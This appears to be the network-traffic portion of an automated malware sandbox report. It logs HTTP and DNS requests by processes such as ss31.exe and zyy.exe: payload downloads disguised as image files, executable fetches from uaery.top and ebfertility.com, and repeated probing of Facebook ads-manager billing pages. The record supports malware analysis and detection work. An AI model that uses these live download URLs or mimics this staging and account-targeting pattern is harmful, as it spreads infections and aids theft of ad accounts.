                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fktt7MsnsiQ6S18LESyhWk7x2O3OEoi00ztyf1u2xdXDU77V%2B0MNnF8Ijxv1Grj77A8gc%2BvBffueBpb%2FKEt8taZmtzJX3G%2BBoRVW1jI6SPJcmoBRn5j73u%2BkyirpJxaQ9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da17df7eb975-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    GET
                                    https://j.ffbbjjkk.com/logo.png
                                    zyy.exe
                                    Remote address:
                                    172.67.158.22:443
                                    Request
                                    GET /logo.png HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: j.ffbbjjkk.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:04 GMT
                                    Content-Type: image/png
                                    Content-Length: 59217
                                    Connection: keep-alive
                                    Last-Modified: Tue, 31 Jan 2023 07:35:43 GMT
                                    ETag: "e751-5f38a611cd3c7"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: REVALIDATED
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=70utFY0Lq%2BBVvfwcNf%2Fb8th87tsVePLED2Dfut2s7bjVM1tWH2MJd5sNmJFgRSyb2XZFG1qmQScEDpGkqc1SYtKvV5%2BB%2FOS%2F13K0rwjpIhTDlbrCfbCKxXdoM0fs%2BhGHGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da2218c1b975-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    GET
                                    https://j.ffbbjjkk.com/2701.html
                                    zyy.exe
                                    Remote address:
                                    172.67.158.22:443
                                    Request
                                    GET /2701.html HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: j.ffbbjjkk.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Length: 571255
                                    Connection: keep-alive
                                    Last-Modified: Wed, 08 Mar 2023 18:28:12 GMT
                                    ETag: "8b777-5f667b0cf6700"
                                    Accept-Ranges: bytes
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PZTMKmUaiywUPsn3dxkDbY3XdeSaKAR76JuBLpvFqHe4y4eW0rUb8ujKz0Wx6MTA7w9hk0kN%2BNauLVLyoF081fGZwzEMICd5mitFrXl1M07IUULM2QMSLRB2mUzhxWxcbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da17cd6d4160-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    GET
                                    https://j.ffbbjjkk.com/logo.png
                                    zyy.exe
                                    Remote address:
                                    172.67.158.22:443
                                    Request
                                    GET /logo.png HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: j.ffbbjjkk.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:04 GMT
                                    Content-Type: image/png
                                    Content-Length: 59217
                                    Connection: keep-alive
                                    Last-Modified: Tue, 31 Jan 2023 07:35:43 GMT
                                    ETag: "e751-5f38a611cd3c7"
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: REVALIDATED
                                    Accept-Ranges: bytes
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pg7u5DGxysqpk11PVfBbFoC%2FSpfByXffmaqug2IGe9adqOaTqBEBwDAkP7Y226zpUB1yx7IjS1pUCh79u6c%2FFHxoRKrmurcB57Z4gwjo7sDEvzA1OUfnxPlZZIbeLzJAsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da21ffc64160-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    GET
                                    http://bz.bbbeioaag.com/sts/bimage.jpg
                                    ss31.exe
                                    Remote address:
                                    45.136.113.107:80
                                    Request
                                    GET /sts/bimage.jpg HTTP/1.1
                                    User-Agent: HTTPREAD
                                    Host: bz.bbbeioaag.com
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx/1.14.0 (Ubuntu)
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Type: image/jpeg
                                    Content-Length: 1516748
                                    Last-Modified: Mon, 06 Mar 2023 16:48:18 GMT
                                    Connection: keep-alive
                                    ETag: "64061952-1724cc"
                                    Accept-Ranges: bytes
                                  • flag-us
                                    GET
                                    http://bz.bbbeioaag.com/sts/bimage.jpg
                                    ss31.exe
                                    Remote address:
                                    45.136.113.107:80
                                    Request
                                    GET /sts/bimage.jpg HTTP/1.1
                                    User-Agent: HTTPREAD
                                    Host: bz.bbbeioaag.com
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx/1.14.0 (Ubuntu)
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Type: image/jpeg
                                    Content-Length: 1516748
                                    Last-Modified: Mon, 06 Mar 2023 16:48:18 GMT
                                    Connection: keep-alive
                                    ETag: "64061952-1724cc"
                                    Accept-Ranges: bytes
                                  • flag-us
                                    DNS
                                    22.158.67.172.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    22.158.67.172.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    107.113.136.45.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    107.113.136.45.in-addr.arpa
                                    IN PTR
                                    Response
                                    107.113.136.45.in-addr.arpa
                                    IN PTR
107.113-136-45.rdns.scalabledns.com
                                  • flag-iq
                                    GET
                                    http://uaery.top/dl/build.exe
                                    Remote address:
                                    185.95.186.58:80
                                    Request
                                    GET /dl/build.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: uaery.top
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:03 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                    Last-Modified: Sun, 19 Mar 2023 04:00:03 GMT
                                    ETag: "c5800-5f738d856a728"
                                    Accept-Ranges: bytes
                                    Content-Length: 808960
                                    Connection: close
                                    Content-Type: application/octet-stream
                                  • flag-us
                                    DNS
                                    y1.ffbbyykk.com
                                    WspService
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    y1.ffbbyykk.com
                                    IN A
                                    Response
                                    y1.ffbbyykk.com
                                    IN A
                                    34.142.181.181
                                  • flag-us
                                    DNS
                                    y1.ffbbyykk.com
                                    WspService
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    y1.ffbbyykk.com
                                    IN AAAA
                                    Response
                                  • flag-us
                                    DNS
                                    52.4.107.13.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    52.4.107.13.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    181.181.142.34.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    181.181.142.34.in-addr.arpa
                                    IN PTR
                                    Response
                                    181.181.142.34.in-addr.arpa
                                    IN PTR
                                     181.181.142.34.bc.googleusercontent.com
                                  • flag-us
                                    DNS
                                    ebfertility.com
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ebfertility.com
                                    IN A
                                    Response
                                    ebfertility.com
                                    IN A
                                    89.190.157.61
                                  • flag-us
                                    GET
                                    http://ebfertility.com/portline-containers.com/serv.exe
                                    Remote address:
                                    89.190.157.61:80
                                    Request
                                    GET /portline-containers.com/serv.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: ebfertility.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:08 GMT
                                    Server: Apache
                                    Last-Modified: Sun, 19 Mar 2023 04:00:03 GMT
                                    Accept-Ranges: bytes
                                    Content-Length: 362496
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/x-msdownload
                                  • flag-us
                                    DNS
                                    61.157.190.89.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    61.157.190.89.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    www.facebook.com
                                    ss31.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    www.facebook.com
                                    IN A
                                    Response
                                    www.facebook.com
                                    IN CNAME
                                    star-mini.c10r.facebook.com
                                    star-mini.c10r.facebook.com
                                    IN A
                                    157.240.5.35
                                  • flag-us
                                    GET
                                    https://www.facebook.com/ads/manager/account_settings/account_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /ads/manager/account_settings/account_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Response
                                    HTTP/1.1 302 Found
                                    Set-Cookie: sb=q4oWZO-iREt03mw-eetDT-Jn; expires=Tue, 18-Mar-2025 04:08:11 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-resource-policy: same-origin
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: 2xbeN3ZJic5IcD5/RTv6Z0Y2zcNpiC1kDRKq+eSGB1AOj/Swsd66yAiCY2OCBuVkrl1GqXdxl7jOdeSRFS5ScA==
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                    Content-Length: 0
                                  • flag-us
                                    GET
                                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Cookie: sb=q4oWZO-iREt03mw-eetDT-Jn
                                    Response
                                    HTTP/1.1 200 OK
                                    Vary: Accept-Encoding
                                    Set-Cookie: fr=0KNY5JpwM6swCwmMA..BkFoqr.vQ.AAA.0.0.BkFoqr.AWWLAO-QH24; expires=Sat, 17-Jun-2023 04:08:10 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'unsafe-eval';style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com https://sandbox.paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: zw5+jz2tcljoMeIt3zOn6dciqnTYe/Iu/DIh9/oZup4oqOK2VDc1f4nB4OLC1q4SmvcByxKMMVBS2u6rl96Euw==
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Transfer-Encoding: chunked
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                  • flag-us
                                    GET
                                    https://www.facebook.com/ads/manager/account_settings/account_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /ads/manager/account_settings/account_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Response
                                    HTTP/1.1 302 Found
                                    Set-Cookie: sb=s4oWZMRWUgPXJGwb_-jy7zCz; expires=Tue, 18-Mar-2025 04:08:19 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-resource-policy: same-origin
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: cIpQD/OMK41mPwZrOVTcAF83eSGPel1Tjlhf28fxXAuRy6ixBitV5j7BhIDXFPPByjg7USDT1cH2Zwz+vA8zyQ==
                                    Date: Sun, 19 Mar 2023 04:08:19 GMT
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                    Content-Length: 0
                                  • flag-us
                                    GET
                                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Cookie: sb=s4oWZMRWUgPXJGwb_-jy7zCz
                                    Response
                                    HTTP/1.1 200 OK
                                    Vary: Accept-Encoding
                                    Set-Cookie: fr=0aOKcXHW4WShsg5DQ..BkFoqz.i4.AAA.0.0.BkFoqz.AWWIFGmJVKc; expires=Sat, 17-Jun-2023 04:08:18 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'unsafe-eval';style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com https://sandbox.paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: ImtU60i3MJ39dAxf4qGnEuxix8dS5806QM0NN2cAlQPviVFyv1Mh9sB87ZI4J8UKeP+jXpi0uRSNqZSIBmLQZw==
                                    Date: Sun, 19 Mar 2023 04:08:20 GMT
                                    Priority: u=3,i
                                    Transfer-Encoding: chunked
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                  • flag-us
                                    GET
                                    https://www.facebook.com/ads/manager/account_settings/account_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /ads/manager/account_settings/account_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Response
                                    HTTP/1.1 302 Found
                                    Set-Cookie: sb=q4oWZEH1qCFBiHp4utzCPaCG; expires=Tue, 18-Mar-2025 04:08:11 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-resource-policy: same-origin
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: 0G70HNQJ5fgmrVRY8Omq9grz+y1/nxZVq50g5cytHRC97OHByuTxp+lxuINLL4HsTveu2sRLT68N5swKC5MqlA==
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                    Content-Length: 0
                                  • flag-us
                                    GET
                                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Cookie: sb=q4oWZEH1qCFBiHp4utzCPaCG
                                    Response
                                    HTTP/1.1 200 OK
                                    Vary: Accept-Encoding
                                    Set-Cookie: fr=0swkjYggLINWgeCqo..BkFoqr.jV.AAA.0.0.BkFoqr.AWXZUU1ECpU; expires=Sat, 17-Jun-2023 04:08:10 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
